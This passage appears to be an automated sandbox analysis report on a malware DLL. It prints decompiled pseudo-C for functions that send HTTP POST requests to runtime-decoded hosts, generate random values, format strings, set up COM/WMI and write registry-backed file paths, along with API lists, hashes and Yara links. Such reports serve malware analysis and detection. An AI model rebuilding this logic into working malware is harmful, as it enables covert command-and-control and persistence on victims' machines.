				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095AD(0x85b);
				_v60 = E100095AD(0xdc9);
				_v56 = E100095AD(0x65d);
				_v52 = E100095AD(0xdd3);
				_t105 = E100095AD(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C384(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E100097F2(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E100097F2(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095AD(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C384(_t217), _a4, _a8);
										E100085A8( &_v12);
										if(_a24 != 0) {
											E100097F2(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E1000972F( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

APIs

memset.MSVCRT ref: 1000E6A5
memset.MSVCRT ref: 1000E6B6
memset.MSVCRT ref: 1000E70B
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000E790

Strings

POST, xrefs: 1000E856

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: b2cbd98b9ed9432ed6e1f8a9232582811ae6687bac74e989c4c0fe043f55e73f
Instruction ID: 7105dce4f630bd9e6e6a53a20e835c867cf8d9cfb236b462118b6997004ea025
Opcode Fuzzy Hash: b2cbd98b9ed9432ed6e1f8a9232582811ae6687bac74e989c4c0fe043f55e73f
Instruction Fuzzy Hash: C2B14CB1900259AFEB55DFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100116C3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E100116C3(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,10007640,?,?,00000000,?), ref: 100116D6
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116EE
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116FD
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 1001170C

Strings

CryptGenRandom, xrefs: 100116F7
advapi32.dll, xrefs: 100116CE
CryptAcquireContextA, xrefs: 100116E8
CryptReleaseContext, xrefs: 10011706

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: ec5d92e1c0308c86bfae05b88449f1b683c9b71fc9a535634b09132dc4920ded
Instruction ID: db89102dffd2ab17b34e924f896f3f155d97b8305924242c9699015d1af8b324
Opcode Fuzzy Hash: ec5d92e1c0308c86bfae05b88449f1b683c9b71fc9a535634b09132dc4920ded
Instruction Fuzzy Hash: 32119431A04619BADB51DBB98C84DFE7BFAEF45640F100464EA05EB280D730CB408B64

Uniqueness

Uniqueness Score: -1.00%

Function 1001212D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001212D(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012290();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122D8();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E100086EC(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109bd
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

APIs

_snprintf.MSVCRT ref: 10012151
localeconv.MSVCRT ref: 1001216C
strchr.MSVCRT ref: 1001217E
strchr.MSVCRT ref: 1001218F
strchr.MSVCRT ref: 1001219D
strchr.MSVCRT ref: 100121C2

Strings

%.*g, xrefs: 10012148

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: 178342c51bf590373a94578d315e398ece8844776024473a8b6624bac67a40ef
Instruction ID: 78b3385665a9946d17acecbf697c3f69bb23403c9f6092c9c513caadce452e38
Opcode Fuzzy Hash: 178342c51bf590373a94578d315e398ece8844776024473a8b6624bac67a40ef
Instruction Fuzzy Hash: FD2145FA60424A3AE321CA689C85BAF37DCDF11270F150115FE408F182E674ECF083A0

Uniqueness

Uniqueness Score: -1.00%

Function 100102BD, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 1001033D
qsort.MSVCRT ref: 100105BB

Strings

null, xrefs: 10010302
false, xrefs: 10010320
%I64d, xrefs: 1001032F
true, xrefs: 10010314

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: d538ba18bf1a1900acc1de5f1acfcc1d0ab55a19687b0d007d211ebddbd5affd
Instruction ID: 256b45a573985ee8e5ebbb4f1a01ee0a2bda1a8772a5177783226d7c6d43e220
Opcode Fuzzy Hash: d538ba18bf1a1900acc1de5f1acfcc1d0ab55a19687b0d007d211ebddbd5affd
Instruction Fuzzy Hash: 1AE17FB1A0020ABFDF11DE65CC46EEF3BA9EF44384F108015FD949E151E7B1DAA19BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10004A0C, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10004A0C(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x87804a0
					_t125 =  *0x1001e68c; // 0x87ffa40
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB73(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B78E(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B663(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C8( &_v1076,  &_v1076, _t206);
					_t141 = E1000D40B( &_v1076, E1000C384( &_v1076), 0);
					E1000B870(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092CB(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x87804a0
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091C9(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091C9(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B29( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9c2);
								E10009F2E(0xe);
								E10009F52(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A091(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3D3(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3D3(_t188, _t180, _t208);
								}
								_t87 = E100097F2(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A091(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x87804a0
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC2A(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x87804a0
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E249(_t183);
										}
										E100052A8( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x87804a0
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085BB( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x87806c8
									_t153 = _t51;
									L25:
									_t90 = E10005527(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x87804a0
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C29D(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x87ff878
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x87ff878
								 *((intOrPtr*)(_t109 + 0x30))();
								E10008600( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E10008600( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E291(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095C7(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFF7(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085BB( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

APIs

memset.MSVCRT ref: 10004A2E
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D20
lstrcatW.KERNEL32(00000000,?), ref: 10004D3E
lstrcatW.KERNEL32(00000000,00000000), ref: 10004D42
lstrcatW.KERNEL32(00000000,1001B994), ref: 10004D4A
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D50

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 62969c4e8768608e47be4c88e0413589d716b6224435312465d12a19acd94c00
Instruction ID: 7ccac8b502451e5b7a742acc225b8edaafd8b9eb524e624c54795ddda11a0b18
Opcode Fuzzy Hash: 62969c4e8768608e47be4c88e0413589d716b6224435312465d12a19acd94c00
Instruction Fuzzy Hash: 3391ADB5604301ABF304DB20DC86F6E73E9EB84390F124A2DF5559B299EF70ED448B56

Uniqueness

Uniqueness Score: -1.00%

Function 1000D753, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000D767
SysAllocString.OLEAUT32(?), ref: 1000D76F
SysAllocString.OLEAUT32(00000000), ref: 1000D783
SysFreeString.OLEAUT32(?), ref: 1000D7FE
SysFreeString.OLEAUT32(?), ref: 1000D801
SysFreeString.OLEAUT32(?), ref: 1000D806

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 533f58d5d8afb924d606c824253e1b92029f16f14e0bed1b48c045e6ad26739a
Instruction ID: 8cf6b93e2451088eb1bb9766ed2507027e49de2e01c3db39ed6556aff2126d07
Opcode Fuzzy Hash: 533f58d5d8afb924d606c824253e1b92029f16f14e0bed1b48c045e6ad26739a
Instruction Fuzzy Hash: A521FB75900219BFDB00DFA5CC88DAFBBBDEF48294B1044AAF505A7250DB70AE05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10010802, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X, xrefs: 1001091C
@, xrefs: 10010870
\u%04X\u%04X, xrefs: 1001095B

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: feb80d3a04cc4fc4cf5808f9b25bd72cd22dbc47354be86eb52a922d1ecc23a5
Instruction ID: 5834604bd64903192ee08d211dc49906cb49224659e5567271de8e71af9a3c4a
Opcode Fuzzy Hash: feb80d3a04cc4fc4cf5808f9b25bd72cd22dbc47354be86eb52a922d1ecc23a5
Instruction Fuzzy Hash: FB413B72B04249ABEB14CDA88CA5BAE36A8DF01294F104116FDC2DE346DAF1CED183D1

Uniqueness

Uniqueness Score: -1.00%

Function 1000D52E, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D52E(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b840, 0, 1, 0x1001b850, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E100085EA(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D541
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D552
CoCreateInstance.OLE32(1001B840,00000000,00000001,1001B850,?,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D569
SysAllocString.OLEAUT32(00000000), ref: 1000D574
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D59F

Part of subcall function 100085EA: RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: f30b641bcf0aa0fe1c904c3557c566646e3f16f6a2450ffed76bd1eba4bc5383
Instruction ID: f9fb2e14203abb558b51dae657c8012b2cf373e276ee73c0d93c46e05e0496eb
Opcode Fuzzy Hash: f30b641bcf0aa0fe1c904c3557c566646e3f16f6a2450ffed76bd1eba4bc5383
Instruction Fuzzy Hash: A821E471600255BBEB249B62CC4DE6FBFBCEFC6B55F11415DB906AA290CA70DA41CA30

Uniqueness

Uniqueness Score: -1.00%

Function 1001220A, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1001220A(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122D8();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L1001229C();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018248;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L1001229C();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018250;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

APIs

localeconv.MSVCRT ref: 10012212
strchr.MSVCRT ref: 10012225
_errno.MSVCRT ref: 10012234
strtod.MSVCRT ref: 10012242
_errno.MSVCRT ref: 1001226F

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: bc4233f11c00668a7001d9a98d59c6705406a7d7ae7faa33f9dc9bcaca41ff71
Instruction ID: bc1e6689561b9e656043b1385d2f50dc6362d0c3bb2d0ffc00f4b959df95ecfa
Opcode Fuzzy Hash: bc4233f11c00668a7001d9a98d59c6705406a7d7ae7faa33f9dc9bcaca41ff71
Instruction Fuzzy Hash: 4801D8B9900145BADB12DF64D90169D7BA4EF4B364F2141D0E9806F1E1CB74D5F5C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF8F, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CF8F(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x87804a0
				GetCurrentProcess();
				_t11 = E1000B9EB();
				_t1 = _t29 + 0x1644; // 0x8781ae4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FA4(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x87806c8
				 *(_t29 + 0x1854) = _t12;
